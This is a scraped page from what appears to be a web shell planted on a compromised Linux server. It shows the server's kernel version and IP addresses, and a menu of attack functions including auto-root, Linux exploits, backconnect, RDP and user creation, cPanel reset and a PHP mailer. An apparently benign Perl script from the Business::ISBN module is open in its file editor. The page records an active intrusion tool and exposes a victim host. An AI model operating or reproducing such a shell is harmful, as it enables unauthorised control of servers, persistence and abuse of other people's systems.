Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.188.227.192
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
Business /
ISBN /
[ HOME SHELL ]
Name
Size
Permission
Action
Data.pm
26.17
KB
-rw-r--r--
RangeMessage.xml
125.34
KB
-rw-r--r--
make_data.pl
1.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : make_data.pl
#!/usr/bin/perl use 5.010; use strict; use warnings; use LWP::Simple; my $js_url = 'http://www.isbn-international.org/converter/ranges.js'; my $js_data = get( $js_url ); die "Could not fetch $js_url!" unless defined $js_data; $js_data =~ s|.*?// \s+ ID \s+ List: \s+||s; my @keys = qw(text ranges); my %data; while( $js_data =~ / ^gi\.area(?<group>\d+)\.text \s* = \s* "(?<text>.*?)" ;? [\r\n]+ ^gi\.area(\1)\.pubrange \s* = \s* "(?<ranges>.*?)" ;? [\r\n]+ /gmx ) { @{ $data{ $+{group} } }{ @keys } = @+{ @keys }; } foreach my $group ( sort keys %data ) { my $empty = $data{$group}{text} =~ s/\s+-\s+no ranges fixed yet\s*//; my $text = $data{$group}{text}; $text =~ s/'/\\'/g; printf "%-5s => [%s => [", $group, qq|'$text'|; ; if( $empty ) { print "] ],\n"; next; } my @ranges = map { if( /-/ ) { map { qq|'$_'| } split /-/, $_ } else { qq|'$_'|, qq|'$_'| } } split /;/, $data{$group}{ranges}; warn "Odd number of ranges for $text!\n" if @ranges % 2; foreach my $i ( 0 .. $#ranges - 1 ) { print $ranges[$i], ( " => ", ", " )[$i % 2]; } print $ranges[-1], "] ],\n"; } # 0 => ['English', ['00' => '19', '200' => '699', '7000' => '8499', '85000' => '89999', '900000' => '949999', '9500000' => '9999999' ] ],
Close